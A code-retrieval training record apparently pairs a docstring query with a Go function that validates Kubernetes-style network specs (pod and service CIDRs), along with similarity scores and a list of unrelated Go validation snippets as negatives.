[ "0.75814086", "0.7003011", "0.69270676", "0.66921806", "0.65416247", "0.6206754", "0.61542016", "0.6152612", "0.6117212", "0.6075632", "0.6073497", "0.6065042", "0.6044899", "0.60341346", "0.5975376", "0.59118503", "0.5901321", "0.58906287", "0.5874365", "0.5820233", "0.5818187", "0.57925946", "0.57750845", "0.57716745", "0.57635194", "0.5750233", "0.5750029", "0.573881", "0.5737968", "0.57239103", "0.5721263", "0.57177556", "0.5701195", "0.56946415", "0.5674482", "0.56444305", "0.5643146", "0.56352556", "0.5634872", "0.5631792", "0.5619693", "0.560876", "0.55863255", "0.5571605", "0.55513257", "0.5531777", "0.5530115", "0.55272156", "0.5519846", "0.551153", "0.5508945", "0.5506988", "0.55039114", "0.5502565", "0.55007863", "0.5491029", "0.54888797", "0.54869854", "0.5482092", "0.54661787", "0.5465021", "0.5464931", "0.5462888", "0.5452917", "0.544678", "0.5437147", "0.5419329", "0.54096675", "0.54016405", "0.53893596", "0.53750277", "0.5368333", "0.53681606", "0.5366748", "0.53648794", "0.5361405", "0.5361125", "0.535634", "0.5342714", "0.5306408", "0.5298685", "0.5287816", "0.52873045", "0.52873045", "0.52873045", "0.52873045", "0.52873045", "0.5286048", "0.52854264", "0.5280414", "0.5266301", "0.5252762", "0.52403027", "0.5228594", "0.5221444", "0.5213728", "0.52130884", "0.5207572", "0.5206134", "0.5201638" ]
0.81501204
0
ValidateNetworkSpec validates the specification of a Network object.
func ValidateNetworkSpec(spec *extensionsv1alpha1.NetworkSpec, fldPath *field.Path) field.ErrorList { allErrs := field.ErrorList{} if len(spec.Type) == 0 { allErrs = append(allErrs, field.Required(fldPath.Child("type"), "field is required")) } var cidrs []cidrvalidation.CIDR if len(spec.PodCIDR) == 0 { allErrs = append(allErrs, field.Required(fldPath.Child("podCIDR"), "field is required")) } else { cidrs = append(cidrs, cidrvalidation.NewCIDR(spec.PodCIDR, fldPath.Child("podCIDR"))) } if len(spec.ServiceCIDR) == 0 { allErrs = append(allErrs, field.Required(fldPath.Child("serviceCIDR"), "field is required")) } else { cidrs = append(cidrs, cidrvalidation.NewCIDR(spec.ServiceCIDR, fldPath.Child("serviceCIDR"))) } allErrs = append(allErrs, cidrvalidation.ValidateCIDRParse(cidrs...)...) allErrs = append(allErrs, cidrvalidation.ValidateCIDROverlap(cidrs, cidrs, false)...) return allErrs }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (m *Network) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateMasterInterface(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func validateNetwork(t *testing.T, workingDir string) {\n\tterraformOptions := test_structure.LoadTerraformOptions(t, workingDir)\n\n\tsubnetNames := terraformOptions.Vars[\"subnet_names\"].([]interface{})\n\n\toutput := terraform.Output(t, terraformOptions, \"network_id\")\n\tassert.NotEmpty(t, output, \"network_id is empty\")\n\n\tsubnets := terraform.OutputList(t, terraformOptions, \"subnet_ids\")\n\tassert.Len(t, subnets, len(subnetNames), \"`subnet_ids` length is invalid\")\n\n\taddresses := terraform.OutputList(t, terraformOptions, \"subnet_address_ranges\")\n\tassert.Len(t, addresses, len(subnetNames), \"`subnet_address_ranges` length is invalid\")\n\n\t// check addresses\n\tfor _, cidr := range addresses {\n\t\t_, _, err := net.ParseCIDR(cidr)\n\t\tassert.Nil(t, err, \"net.ParseCIDR\")\n\t}\n}", "func (m *PVMInstanceNetwork) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func ValidateNetworkSpecUpdate(new, old *extensionsv1alpha1.NetworkSpec, deletionTimestampSet bool, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif deletionTimestampSet && !apiequality.Semantic.DeepEqual(new, old) {\n\t\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new, old, fldPath)...)\n\t\treturn allErrs\n\t}\n\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.Type, old.Type, fldPath.Child(\"type\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.PodCIDR, old.PodCIDR, fldPath.Child(\"podCIDR\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.ServiceCIDR, old.ServiceCIDR, fldPath.Child(\"serviceCIDR\"))...)\n\n\treturn allErrs\n}", "func ValidateNetwork(network *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMeta(&network.ObjectMeta, true, apivalidation.NameIsDNSSubdomain, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpec(&network.Spec, field.NewPath(\"spec\"))...)\n\n\treturn allErrs\n}", "func (n *Network) Validate() field.ErrorList {\n\tvar validateErrors field.ErrorList\n\n\t// validate network config (id, genesis, consensus and join)\n\tvalidateErrors = append(validateErrors, n.Spec.NetworkConfig.Validate()...)\n\n\t// validate nodes\n\tvalidateErrors = append(validateErrors, n.ValidateNodes()...)\n\n\treturn validateErrors\n}", "func (in *NetworkSpec) DeepCopy() *NetworkSpec {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(NetworkSpec)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func ValidateNetworkStatus(spec *extensionsv1alpha1.NetworkStatus, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func (m *NetworkResource) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateIPAM(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateIndexConfigs(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateNetworkUpdate(new, old *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMetaUpdate(&new.ObjectMeta, &old.ObjectMeta, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpecUpdate(&new.Spec, &old.Spec, new.DeletionTimestamp != nil, field.NewPath(\"spec\"))...)\n\tallErrs = append(allErrs, ValidateNetwork(new)...)\n\n\treturn allErrs\n}", "func validateNetworkInputs(p netintents.Network) error {\n\t// validate name\n\terrs := validation.IsValidName(p.Metadata.Name)\n\tif len(errs) > 0 {\n\t\treturn pkgerrors.Errorf(\"Invalid network name - name=[%v], errors: %v\", p.Metadata.Name, errs)\n\t}\n\n\t// validate cni type\n\tfound := false\n\tfor _, val := range nettypes.CNI_TYPES {\n\t\tif p.Spec.CniType == val {\n\t\t\tfound = true\n\t\t\tbreak\n\t\t}\n\t}\n\tif !found {\n\t\treturn pkgerrors.Errorf(\"Invalid cni type: %v\", p.Spec.CniType)\n\t}\n\n\tsubnets := p.Spec.Ipv4Subnets\n\tfor _, subnet := range subnets {\n\t\terr := nettypes.ValidateSubnet(subnet)\n\t\tif err != nil {\n\t\t\treturn pkgerrors.Wrap(err, \"invalid subnet\")\n\t\t}\n\t}\n\treturn nil\n}", "func (m *NetworkElement) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// validation for a type composition with EquipmentBase\n\tif err := m.EquipmentBase.Validate(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateCards(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateFanmodules(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateManagementContoller(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateManagementEntity(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validatePsus(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateRegisteredDevice(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTopSystem(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateUcsmRunningFirmware(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateNetworkMode(c *Config) error {\n\tif c.General.Mode == \"\" {\n\t\tc.General.Mode = DefaultNetMode\n\t}\n\tc.General.Mode = strings.ToLower(c.General.Mode)\n\tswitch c.General.Mode {\n\tcase DualStackNetMode:\n\t\tfallthrough\n\tcase IPv4NetMode:\n\t\tfallthrough\n\tcase IPv6NetMode:\n\t\tglog.Infof(\"Building cluster in mode %q\", c.General.Mode)\n\tdefault:\n\t\treturn fmt.Errorf(\"unsupported network mode %q entered\", c.General.Mode)\n\t}\n\treturn nil\n}", "func (m *RecoveryPlanNetworkInfo) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateNetworkMapping(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStaticIPAssignment(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func Validate(name string, netType string, config map[string]string) error {\n\tdriverFunc, ok := drivers[netType]\n\tif !ok {\n\t\treturn ErrUnknownDriver\n\t}\n\n\tn := driverFunc()\n\tn.init(nil, 0, name, netType, \"\", config, \"Unknown\")\n\n\terr := n.ValidateName(name)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"Network name invalid\")\n\t}\n\n\treturn n.Validate(config)\n}", "func (nt NetworkType) Validate() error {\n\tswitch nt {\n\tcase NetworkTypeDefault, NetworkTypeHost, NetworkTypeWeave:\n\t\treturn nil\n\tdefault:\n\t\treturn maskAny(errgo.WithCausef(nil, ValidationError, \"unknown network type '%s'\", string(nt)))\n\t}\n}", "func (m *ManagerNetworkProtocol100ManagerNetworkProtocol) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateHTTP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateHTTPS(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateIPMI(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateKVMIP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSNMP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSSDP(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSSH(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateStatus(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTelnet(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateVirtualMedia(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func validNetwork(i string) bool {\n\t_, _, err := net.ParseCIDR(i)\n\tif err == nil {\n\t\treturn true\n\t}\n\tif net.ParseIP(i) != nil {\n\t\treturn true\n\t}\n\treturn false\n}", "func NetworkOptionsFromSpec(spec *specs.Spec) (types.NetworkOptions, error) {\n\topts := types.NetworkOptions{}\n\n\tif spec == nil {\n\t\treturn opts, fmt.Errorf(\"cannot determine networking options from nil spec\")\n\t}\n\tif spec.Annotations == nil {\n\t\treturn opts, fmt.Errorf(\"cannot determine networking options from nil spec.Annotations\")\n\t}\n\n\topts.Hostname = spec.Hostname\n\n\tif macAddress, ok := spec.Annotations[labels.MACAddress]; ok {\n\t\topts.MACAddress = macAddress\n\t}\n\n\tif ipAddress, ok := spec.Annotations[labels.IPAddress]; ok {\n\t\topts.IPAddress = ipAddress\n\t}\n\n\tvar networks []string\n\tnetworksJSON := spec.Annotations[labels.Networks]\n\tif err := json.Unmarshal([]byte(networksJSON), &networks); err != nil {\n\t\treturn opts, err\n\t}\n\topts.NetworkSlice = networks\n\n\tif portsJSON := spec.Annotations[labels.Ports]; portsJSON != \"\" {\n\t\tif err := json.Unmarshal([]byte(portsJSON), &opts.PortMappings); err != nil {\n\t\t\treturn opts, err\n\t\t}\n\t}\n\n\treturn opts, nil\n}", "func (self *Platform) ValidateSpec(spec *pb.ChaincodeSpec) error {\n\treturn nil\n}", "func (c *networkConfiguration) Validate() error {\n\tif c.Mtu < 0 {\n\t\treturn ErrInvalidMtu(c.Mtu)\n\t}\n\n\t// If bridge v4 subnet is specified\n\tif c.AddressIPv4 != nil {\n\t\t// If default gw is specified, it must be part of bridge subnet\n\t\tif c.DefaultGatewayIPv4 != nil {\n\t\t\tif !c.AddressIPv4.Contains(c.DefaultGatewayIPv4) {\n\t\t\t\treturn &ErrInvalidGateway{}\n\t\t\t}\n\t\t}\n\t}\n\n\t// If default v6 gw is specified, AddressIPv6 must be specified and gw must belong to AddressIPv6 subnet\n\tif c.EnableIPv6 && c.DefaultGatewayIPv6 != nil {\n\t\tif c.AddressIPv6 == nil || !c.AddressIPv6.Contains(c.DefaultGatewayIPv6) {\n\t\t\treturn &ErrInvalidGateway{}\n\t\t}\n\t}\n\treturn nil\n}", "func (m *IPLBVrackNetworkVrackNetwork) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateSubnet(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateVrackNetworkID(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (o *BaseEdgeLBPoolSpec) Validate() error {\n\t// Set default values where applicable for easier validation.\n\to.setDefaults()\n\n\t// Make sure that the name of the target EdgeLB pool is valid.\n\tif !regexp.MustCompile(constants.EdgeLBPoolNameRegex).MatchString(*o.Name) {\n\t\treturn fmt.Errorf(\"%q is not a valid edgelb pool name\", *o.Name)\n\t}\n\t// Validate the CPU request.\n\tif *o.CPUs < 0 {\n\t\treturn fmt.Errorf(\"%f is not a valid cpu request\", *o.CPUs)\n\t}\n\t// Validate the memory request.\n\tif *o.Memory < 0 {\n\t\treturn fmt.Errorf(\"%d is not a valid memory request\", *o.Memory)\n\t}\n\t// Validate the size request.\n\tif *o.Size <= 0 {\n\t\treturn fmt.Errorf(\"%d is not a valid size request\", *o.Size)\n\t}\n\t// Validate the cloud-provider configuration.\n\tif *o.CloudProviderConfiguration != \"\" {\n\t\tcp := &models.V2CloudProvider{}\n\t\tif err := json.Unmarshal([]byte(*o.CloudProviderConfiguration), cp); err != nil {\n\t\t\treturn fmt.Errorf(\"the cloud-provider configuration is not valid: %v\", err)\n\t\t}\n\t\tif !strings.HasPrefix(*o.Name, constants.EdgeLBCloudProviderPoolNamePrefix) {\n\t\t\treturn fmt.Errorf(\"the name of the target edgelb pool must start with the %q prefix\", constants.EdgeLBCloudProviderPoolNamePrefix)\n\t\t}\n\t\tif *o.Network != constants.EdgeLBHostNetwork {\n\t\t\treturn fmt.Errorf(\"cannot join a virtual network when a cloud-provider configuration is provided\")\n\t\t}\n\t} else {\n\t\t// If the target EdgeLB pool's role is \"slave_public\" and a non-empty name for the DC/OS virtual network has been specified, we should fail and warn the user.\n\t\tif *o.Role == constants.EdgeLBRolePublic && *o.Network != constants.EdgeLBHostNetwork {\n\t\t\treturn fmt.Errorf(\"cannot join a virtual network when the pool's role is %q\", *o.Role)\n\t\t}\n\t\t// If the target EdgeLB pool's role is NOT \"slave_public\" and no custom name for the DC/OS virtual network has been specified, we should fail and warn the user.\n\t\tif *o.Role != constants.EdgeLBRolePublic && *o.Network == constants.EdgeLBHostNetwork {\n\t\t\treturn fmt.Errorf(\"cannot join the host network when the pool's role is %q\", *o.Role)\n\t\t}\n\t}\n\treturn nil\n}", "func (e NetEvent) Validate() (bool, error) {\n\tif !e.isValidated {\n\t\tif e.NetDevice == \"\" {\n\t\t\treturn false, fmt.Errorf(\"source device for event not specified\")\n\t\t}\n\t}\n\treturn true, nil\n}", "func (m *NetworkEpcConfigs) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateCloudSubscriberdbEnabled(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateDefaultRuleID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateLteAuthAmf(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateLteAuthOp(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateMcc(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateMnc(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateNetworkServices(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateRelayEnabled(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSubProfiles(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateTac(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (s *SpecGenerator) Validate() error {\n\t// Containers being added to a pod cannot have certain network attributes\n\t// associated with them because those should be on the infra container.\n\tif len(s.Pod) > 0 && s.NetNS.NSMode == FromPod {\n\t\tif len(s.Networks) > 0 {\n\t\t\treturn fmt.Errorf(\"networks must be defined when the pod is created: %w\", define.ErrNetworkOnPodContainer)\n\t\t}\n\t\tif len(s.PortMappings) > 0 || s.PublishExposedPorts {\n\t\t\treturn fmt.Errorf(\"published or exposed ports must be defined when the pod is created: %w\", define.ErrNetworkOnPodContainer)\n\t\t}\n\t\tif len(s.HostAdd) > 0 {\n\t\t\treturn fmt.Errorf(\"extra host entries must be specified on the pod: %w\", define.ErrNetworkOnPodContainer)\n\t\t}\n\t}\n\n\tif s.NetNS.IsContainer() && len(s.HostAdd) > 0 {\n\t\treturn fmt.Errorf(\"cannot set extra host entries when the container is joined to another containers network namespace: %w\", ErrInvalidSpecConfig)\n\t}\n\n\t//\n\t// ContainerBasicConfig\n\t//\n\t// Rootfs and Image cannot both populated\n\tif len(s.ContainerStorageConfig.Image) > 0 && len(s.ContainerStorageConfig.Rootfs) > 0 {\n\t\treturn fmt.Errorf(\"both image and rootfs cannot be simultaneously: %w\", ErrInvalidSpecConfig)\n\t}\n\t// Cannot set hostname and utsns\n\tif len(s.ContainerBasicConfig.Hostname) > 0 && !s.ContainerBasicConfig.UtsNS.IsPrivate() {\n\t\tif s.ContainerBasicConfig.UtsNS.IsPod() {\n\t\t\treturn fmt.Errorf(\"cannot set hostname when joining the pod UTS namespace: %w\", ErrInvalidSpecConfig)\n\t\t}\n\n\t\treturn fmt.Errorf(\"cannot set hostname when running in the host UTS namespace: %w\", ErrInvalidSpecConfig)\n\t}\n\t// systemd values must be true, false, or always\n\tif len(s.ContainerBasicConfig.Systemd) > 0 && !util.StringInSlice(strings.ToLower(s.ContainerBasicConfig.Systemd), SystemDValues) {\n\t\treturn fmt.Errorf(\"--systemd values must be one of %q: %w\", strings.Join(SystemDValues, \", \"), ErrInvalidSpecConfig)\n\t}\n\n\tif err := define.ValidateSdNotifyMode(s.ContainerBasicConfig.SdNotifyMode); err != nil {\n\t\treturn err\n\t}\n\n\t//\n\t// ContainerStorageConfig\n\t//\n\t// rootfs and image cannot both be set\n\tif len(s.ContainerStorageConfig.Image) > 0 && len(s.ContainerStorageConfig.Rootfs) > 0 {\n\t\treturn exclusiveOptions(\"rootfs\", \"image\")\n\t}\n\t// imagevolumemode must be one of ignore, tmpfs, or anonymous if given\n\tif len(s.ContainerStorageConfig.ImageVolumeMode) > 0 && !util.StringInSlice(strings.ToLower(s.ContainerStorageConfig.ImageVolumeMode), ImageVolumeModeValues) {\n\t\treturn fmt.Errorf(\"invalid ImageVolumeMode %q, value must be one of %s\",\n\t\t\ts.ContainerStorageConfig.ImageVolumeMode, strings.Join(ImageVolumeModeValues, \",\"))\n\t}\n\t// shmsize conflicts with IPC namespace\n\tif s.ContainerStorageConfig.ShmSize != nil && (s.ContainerStorageConfig.IpcNS.IsHost() || s.ContainerStorageConfig.IpcNS.IsNone()) {\n\t\treturn fmt.Errorf(\"cannot set shmsize when running in the %s IPC Namespace\", s.ContainerStorageConfig.IpcNS)\n\t}\n\n\t//\n\t// ContainerSecurityConfig\n\t//\n\t// userns and idmappings conflict\n\tif s.UserNS.IsPrivate() && s.IDMappings == nil {\n\t\treturn fmt.Errorf(\"IDMappings are required when not creating a User namespace: %w\", ErrInvalidSpecConfig)\n\t}\n\n\t//\n\t// ContainerCgroupConfig\n\t//\n\t//\n\t// None for now\n\n\t//\n\t// ContainerNetworkConfig\n\t//\n\t// useimageresolveconf conflicts with dnsserver, dnssearch, dnsoption\n\tif s.UseImageResolvConf {\n\t\tif len(s.DNSServers) > 0 {\n\t\t\treturn exclusiveOptions(\"UseImageResolvConf\", \"DNSServer\")\n\t\t}\n\t\tif len(s.DNSSearch) > 0 {\n\t\t\treturn exclusiveOptions(\"UseImageResolvConf\", \"DNSSearch\")\n\t\t}\n\t\tif len(s.DNSOptions) > 0 {\n\t\t\treturn exclusiveOptions(\"UseImageResolvConf\", \"DNSOption\")\n\t\t}\n\t}\n\t// UseImageHosts and HostAdd are exclusive\n\tif s.UseImageHosts && len(s.HostAdd) > 0 {\n\t\treturn exclusiveOptions(\"UseImageHosts\", \"HostAdd\")\n\t}\n\n\t// TODO the specgen does not appear to handle this? Should it\n\t// switch config.Cgroup.Cgroups {\n\t// case \"disabled\":\n\t//\tif addedResources {\n\t//\t\treturn errors.New(\"cannot specify resource limits when cgroups are disabled is specified\")\n\t//\t}\n\t//\tconfigSpec.Linux.Resources = &spec.LinuxResources{}\n\t// case \"enabled\", \"no-conmon\", \"\":\n\t//\t// Do nothing\n\t// default:\n\t//\treturn errors.New(\"unrecognized option for cgroups; supported are 'default', 'disabled', 'no-conmon'\")\n\t// }\n\t// Namespaces\n\tif err := s.UtsNS.validate(); err != nil {\n\t\treturn err\n\t}\n\tif err := validateIPCNS(&s.IpcNS); err != nil {\n\t\treturn err\n\t}\n\tif err := s.PidNS.validate(); err != nil {\n\t\treturn err\n\t}\n\tif err := s.CgroupNS.validate(); err != nil {\n\t\treturn err\n\t}\n\tif err := validateUserNS(&s.UserNS); err != nil {\n\t\treturn err\n\t}\n\n\tif err := validateNetNS(&s.NetNS); err != nil {\n\t\treturn err\n\t}\n\tif s.NetNS.NSMode != Bridge && len(s.Networks) > 0 {\n\t\t// Note that we also get the ip and mac in the networks map\n\t\treturn errors.New(\"networks and static ip/mac address can only be used with Bridge mode networking\")\n\t}\n\n\treturn nil\n}", "func NewNetwork(spec *types.NetworkSpec) (Network, error) {\n\tn := &network{\n\t\tname: spec.Name,\n\t\ttyp: spec.Type,\n\t\tuseNAT: spec.UseNAT,\n\t}\n\tif len(spec.Address) > 0 {\n\t\taddr, err := netlink.ParseAddr(spec.Address)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tn.addr = addr\n\t}\n\n\treturn n, nil\n}", "func validateExternalNetwork(ctx context.Context, cli client.Client, externalNetwork string) error {\n\tinstance := &crdv1.ExternalNetwork{}\n\tkey := types.NamespacedName{Name: externalNetwork}\n\terr := cli.Get(ctx, key, instance)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func IsIPNetValid(nw *net.IPNet) bool {\n\treturn nw.String() != \"0.0.0.0/0\"\n}", "func ValidateNetworks(Validations Validations, Service types.ServiceConfig) error {\n\tfor Network := range Service.Networks {\n\t\tif !goutil.StringInSlice(Network, Validations.Networks) {\n\t\t\treturn fmt.Errorf(\"Network '%s' not in the whitelist\", Network)\n\t\t}\n\t}\n\treturn nil\n}", "func (n NetworkConfig) validate() error {\n\tif n.IsEmpty() {\n\t\treturn nil\n\t}\n\tif err := n.VPC.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"vpc\": %w`, err)\n\t}\n\tif err := n.Connect.validate(); err != nil {\n\t\treturn fmt.Errorf(`validate \"connect\": %w`, err)\n\t}\n\treturn nil\n}", "func (m *AzureRMNetworkSecurityGroupConfiguration) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateSecurityRule(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func verifyNetworkState(t *testing.T, tenant, network, encap, subnet, gw string, subnetLen uint, pktTag, extTag int) {\n\tnetworkID := network + \".\" + tenant\n\tnwCfg := &mastercfg.CfgNetworkState{}\n\tnwCfg.StateDriver = stateStore\n\terr := nwCfg.Read(networkID)\n\tif err != nil {\n\t\tt.Fatalf(\"Network state for %s not found. Err: %v\", networkID, err)\n\t}\n\n\t// verify network params\n\tif nwCfg.Tenant != tenant || nwCfg.NetworkName != network ||\n\t\tnwCfg.PktTagType != encap || nwCfg.SubnetIP != netutils.GetSubnetAddr(subnet, subnetLen) || nwCfg.Gateway != gw {\n\t\tt.Fatalf(\"Network state {%+v} did not match expected state\", nwCfg)\n\t}\n\n\t// verify network tags\n\tif (pktTag != 0 && nwCfg.PktTag != pktTag) ||\n\t\t(extTag != 0 && nwCfg.ExtPktTag != extTag) {\n\t\tt.Fatalf(\"Network tags %d/%d did not match expected %d/%d\",\n\t\t\tnwCfg.PktTag, nwCfg.ExtPktTag, pktTag, extTag)\n\t}\n}", "func (n *Network) ValidateUpdate(old runtime.Object) error {\n\tvar allErrors field.ErrorList\n\toldNetwork := old.(*Network)\n\n\tnetworklog.Info(\"validate update\", \"name\", n.Name)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Validate()...)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Spec.NetworkConfig.ValidateUpdate(&oldNetwork.Spec.NetworkConfig)...)\n\n\t// maximum allowed nodes with different name\n\tvar maxDiff int\n\t// all old nodes names\n\toldNodesNames := map[string]bool{}\n\t// nodes count in the old network spec\n\toldNodesCount := len(oldNetwork.Spec.Nodes)\n\t// nodes count in the new network spec\n\tnewNodesCount := len(n.Spec.Nodes)\n\t// nodes with different names than the old spec\n\tdifferentNodes := map[string]int{}\n\n\tif newNodesCount > oldNodesCount {\n\t\tmaxDiff = newNodesCount - oldNodesCount\n\t}\n\n\tfor _, node := range oldNetwork.Spec.Nodes {\n\t\toldNodesNames[node.Name] = true\n\t}\n\n\tfor i, node := range n.Spec.Nodes {\n\t\tif exists := oldNodesNames[node.Name]; !exists {\n\t\t\tdifferentNodes[node.Name] = i\n\t\t}\n\t}\n\n\tif len(differentNodes) > maxDiff {\n\t\tfor nodeName, i := range differentNodes {\n\t\t\terr := field.Invalid(field.NewPath(\"spec\").Child(\"nodes\").Index(i).Child(\"name\"), nodeName, \"field is immutable\")\n\t\t\tallErrors = append(allErrors, err)\n\t\t}\n\t}\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, n.Name, allErrors)\n\n}", "func (cfg *NetworkServiceConfig) IsValid() error {\n\tif cfg.Mechanism == \"\" {\n\t\treturn errors.New(\"invalid mechanism specified\")\n\t}\n\tswitch cfg.Mechanism {\n\tcase memif.MECHANISM:\n\t\t// Verify folder for memif file exists and writable.\n\t\t//TODO: Add support of this validation.\n\tcase kernel.MECHANISM:\n\t\t// Verify interface name\n\t\tif len(cfg.Path) > 1 {\n\t\t\treturn errors.New(\"invalid client interface name specified\")\n\t\t}\n\t\tif len(cfg.Path[0]) > 15 {\n\t\t\treturn errors.New(\"interface part cannot exceed 15 characters\")\n\t\t}\n\t}\n\treturn nil\n}", "func MustParseNet(n string) *net.IPNet {\n\t_, parsedNet, err := net.ParseCIDR(n)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn parsedNet\n}", "func checkCreateNetwork(t *testing.T, expError bool, tenant, network, encap, subnet, gw string, tag int) {\n\tnet := client.Network{\n\t\tTenantName: tenant,\n\t\tNetworkName: network,\n\t\tEncap: encap,\n\t\tSubnet: subnet,\n\t\tGateway: gw,\n\t\tPktTag: tag,\n\t}\n\terr := contivClient.NetworkPost(&net)\n\tif err != nil && !expError {\n\t\tt.Fatalf(\"Error creating network {%+v}. Err: %v\", net, err)\n\t} else if err == nil && expError {\n\t\tt.Fatalf(\"Create network {%+v} succeded while expecing error\", net)\n\t} else if err == nil {\n\t\t// verify network is created\n\t\t_, err := contivClient.NetworkGet(tenant, network)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Error getting network %s/%s. Err: %v\", tenant, network, err)\n\t\t}\n\t}\n}", "func (m *NetworkSentryConfig) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateSampleRate(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateURLNative(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateURLPython(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn 